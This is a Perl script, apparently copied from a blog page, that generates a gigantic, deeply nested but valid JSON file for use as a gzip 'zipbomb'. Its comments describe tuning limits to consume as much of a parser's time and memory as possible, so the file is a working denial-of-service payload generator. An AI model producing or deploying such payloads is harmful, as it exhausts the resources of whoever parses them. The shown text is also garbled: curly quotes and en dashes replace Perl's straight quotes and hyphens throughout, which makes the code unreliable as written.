#!/usr/bin/perl -w
# Copyright © 2026 Jamie Zawinski <jwz@jwz.org>
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation.  No representations are made about the suitability of this
# software for any purpose.  It is provided “as is” without express or
# implied warranty.
#
# Creates an absolutely enormous, but syntactically correct, JSON file,
# suitable for use as a zipbomb.
#
# It attempts to stay below various length and depth limitations, with my
# best guesses as to what typical parsers’ limits are; the goal here being
# to consume as much of the parser’s time and memory as possible before it
# has an excuse to give up early.
#
# With a 10GB file, ‘jq’ parses the entire file and produces no error
# messages, but also no output, and takes nearly 60 seconds to do so
# (Mac Studio M1 Ultra, 2026).
#
# “jsonbomb.pl –max-size 10GB | gzip –best” yields a 705MB file.
# With –no-permute-strings, it is a more reasonable 61MB.
#
# See https://www.jwz.org/blog/2026/01/zipbomb-json/
# and https://www.jwz.org/blog/2024/02/harassing-botnets-with-zipbombs/
#
# Created:  1-Feb-2026.

require 5;
use diagnostics;
use strict;
no warnings “recursion”;

my $progname = $0; $progname =~ s@.*/@@g;
my ($version) = (‘$Revision: 1.05 $’ =~ m/\s(\d[.\d]+)\s/s);

my $verbose = 1;

my $permute_strings_p     = 1;
my $max_string_length     = 1024;

my $max_object_keys       = 1024;
my $max_object_depth      = 1024;
my $max_object_key_length = 250;

my $max_array_length      = 1024;
my $max_array_depth       = 1024;

my $max_output_bytes      = 1024 * 1024;

my $base_text = ‘All work and no play makes Jack a dull boy.’;

sub parse_bytes($$) {
  my ($arg, $s) = @_;
  usage (“unparsable size: $arg”) unless defined($s);
  if    ($s =~ s@^(\d[.\d]*)\s*KB?$@@si) { return $1 * 1024; }
  elsif ($s =~ s@^(\d[.\d]*)\s*MB?$@@si) { return $1 * 1024*1024; }
  elsif ($s =~ s@^(\d[.\d]*)\s*GB?$@@si) { return $1 * 1024*1024*1024; }
  elsif ($s =~ m/^(\d[.\d]*)$/s)         { return $1 + 0; }
  # usage (“unparsable size: $arg $s”);
  return undef;
}

sub size_str($) {
  my ($size) = @_;
  if (!defined($size)) {
    return ‘0 bytes’;
  } elsif ($size > 2*1024*1024*1024) {
    return sprintf(“%.0f GB”, $size / (1024*1024*1024));
  } elsif ($size > 1024*1024) {
    return sprintf(“%.0f MB”, $size / (1024*1024));
  } elsif ($size > 1024) {
    return sprintf(“%d KB”,   $size / 1024);
  } else {
    return “$size bytes”;
  }
}

my $last_status_time = undef;
sub status($) {
  my ($bytes) = @_;
  return unless $verbose;
  my $t = time();
  $last_status_time = $t unless defined($last_status_time);
  if ($t > $last_status_time + 10) {
    my $pct = 100 * $bytes / $max_output_bytes;
    print STDERR “$progname: ” .
      sprintf(“%s (%.0f%%) of %s\n”,
              size_str($bytes), $pct, size_str($max_output_bytes));
    $last_status_time = $t;
  }
}

# Permute the strings in case the parser interns them for efficiency.
sub scrmable($) {
  my ($line) = @_;
  my @words;
  foreach my $word (split (/\s+/, $line)) {
    my @w = split (//, $word);
    my $A = shift (@w);
    my $Z = pop (@w);
    if (defined($Z) && rand() > 0.8) {
      my $i = scalar (@w);
      while ($i– > 0) {
        my $j = int (rand() * $i);
        my $s = $w[$i];
        $w[$i] = $w[$j];
        $w[$j] = $s;
        $i = 0;
      }
      $word = $A . join (”, @w) . $Z;
    }
    $word = uc($word) if (rand() > 0.9);
    push @words, $word;
  }
  return join (‘ ‘, @words);
}

sub make_string($) {
  my ($max_length) = @_;
  my $L = length($base_text);
  my $L2 = 0;
  my @s = ();
  while ($L2 + $L < $max_length) {
    push @s, $base_text;
    $L2 += $L + 1;
  }

  if (!@s) {
    my $start = ($permute_strings_p
                 ? int ($L * rand() * 0.3)
                 : 0);
    my $L3 = $L – $start;
    $L3 = $max_length if ($L3 > $max_length);
    $L3 = ($permute_strings_p
           ? int ($L3 * (1 – rand() * 0.3))
           : $L3);
    push @s, substr ($base_text, $start, $L3);
  }

  my $s = join(‘ ‘, @s);
  $s = scrmable ($s) if ($permute_strings_p);

  # This can exceed $max_string_length if $base_text has special characters,
  # but we don’t want to split at a backslash and cause a syntax error.
  $s =~ s/([\\\”\’\n])/\\$1/gs;

  return ‘”‘ . $s . ‘”‘;
}

# I’d kind of like to unroll this to use heap instead of stack,
# but it’s sure a lot easiser to think about it recursively.

sub json_emit_thing($$$);
sub json_emit_thing($$$) {
  my ($type, $depth, $total_bytes) = @_;

  my $this_bytes = 0;
  if ($type eq ‘string’) {

    my $s = make_string ($max_string_length);
    print STDOUT $s;
    $this_bytes += length($s);

  } elsif ($type eq ‘array’) {
    my $n = int ($max_array_length * (1 – (rand() * 0.2)));

    my @types = ($depth >= $max_array_depth
                 ? (‘string’)
                 : (‘string’, ‘string’, ‘string’, ‘string’, ‘object’));
    print STDOUT ‘[‘;
    $this_bytes++;
    for (my $i = 0; $i < $n; $i++) {
      if ($i > 0) {
        print STDOUT “,\n”;
        $this_bytes += 2;
      }
      my $type2 = $types[int(rand() * @types)];
      $this_bytes += json_emit_thing ($type2, $depth + 1,
                                      $total_bytes + $this_bytes);
      last if ($total_bytes + $this_bytes > $max_output_bytes);
    }
    print STDOUT ‘]’;
    $this_bytes++;

  } elsif ($type eq ‘object’) {
    my $n = int ($max_array_length * (1 – (rand() * 0.2)));

    my @types = ($depth >= $max_object_depth
                 ? (‘string’)
                 : (‘string’, ‘string’, ‘string’, ‘string’, ‘object’));
    print STDOUT ‘{‘;
    $this_bytes++;

    # Technically duplicate keys are allowed (last one wins) but some
    # parsers consider it an error.
    my %dups;

    for (my $i = 0; $i < $n; $i++) {
      if ($i > 0) {
        print STDOUT “,\n”;
        $this_bytes += 2;
      }

      my $s = make_string ($max_object_key_length);
      $s =~ s/\s/_/gs;

      if ($dups{$s}) {
        my $ii = sprintf(“%X”, $i);
        $s =~ s/”$/_$ii”/s;
      }
      $dups{$s} = 1;

      print STDOUT $s;
      $this_bytes += length($s);
      print STDOUT “:”;
      $this_bytes++;

      my $type2 = $types[int(rand() * @types)];
      $this_bytes += json_emit_thing ($type2, $depth + 1,
                                      $total_bytes + $this_bytes);
      last if ($total_bytes + $this_bytes > $max_output_bytes);
    }
    print STDOUT ‘}’;
    $this_bytes++;

  } else {
    error (“unknown type: $type”);
  }

  status ($total_bytes + $this_bytes);
  return $this_bytes;
}

sub jsonbomb() {
 
  # Top level object is always an array.

  print STDOUT ‘[‘;
  my $bytes = 1;

  my $i = 0;
  while ($bytes < $max_output_bytes) {
    if ($i > 0) {
      print STDOUT “,\n”;
      $bytes += 2;
    }

    my @types = (‘array’, ‘object’, ‘string’, ‘string’, ‘string’, ‘string’);
    my $type = $types[int(rand() * @types)];
    $bytes += json_emit_thing ($type, 0, $bytes);
    $i++;

    if ($i > $max_array_length) {
      # We’ve hit the max length of the top-level array object.
      # Increase the limits and keep going, because why not.
      print STDERR “$progname: hit max length; increasing limits.\n”
        if ($verbose);
      $max_array_length *= 2;
      $max_object_depth *= 2;
      $max_array_depth  *= 2;
    }
  }

  print STDOUT “]\n”;

  $last_status_time = 0;
  status ($bytes);
}

sub error($) {
  my ($err) = @_;
  print STDERR “$progname: $err\n”;
  exit 1;
}

sub usage(;$) {
  my ($a) = $_;
  print STDERR “$progname: unknown option: $a\n” if defined($a);
  print STDERR “usage: $progname [–verbose] [–quiet]” .
   ” [–max-size ” . sprintf(“%dK”, $max_output_bytes/1024) . “]” .
   ” [–permute-strings | –no-permute-strings]” .
   ” [–max-object-keys $max_object_keys]” .
   ” [–max-object-depth $max_object_depth]” .
   ” [–max-object-key-length $max_object_key_length]” .
   ” [–max-array-length $max_array_length]” .
   ” [–max-array-depth $max_array_depth]” .
   ” [–max-string-length $max_string_length]” .
   ” [–base-text STRING]” .
   ” > OUTFILE.json\n”;
  exit 1;
}

sub main() {
  while (@ARGV) {
    $_ = shift @ARGV;
    if (m/^–?verbose$/s) { $verbose++; }
    elsif (m/^-v+$/s) { $verbose += length($_)-1; }
    elsif (m/^–?quiet$/s) { $verbose = 0; }
    elsif (m/^–?max-size$/s) {
      $max_output_bytes  = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?max-object-keys$/s) {
      $max_object_keys   = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?max-object-depth$/s) {
      $max_object_depth  = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?max-object-key-length$/s) {
      $max_object_key_length = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?max-array-length$/s) {
      $max_array_length  = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?max-array-depth$/s) {
      $max_array_depth   = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?max-string-length$/s) {
      $max_string_length = parse_bytes ($_, shift @ARGV); }
    elsif (m/^–?base-text$/s) { $base_text = shift @ARGV; }
    elsif (m/^–?permute(-strings?)?$/s) { $permute_strings_p = 1; }
    elsif (m/^–?no-permute(-strings?)?$/s) { $permute_strings_p = 0; }

    elsif (m/^-./s) { usage ($_); }
    else { usage ($_); }
  }

  jsonbomb();
}

main();
exit 0;

Leave a Reply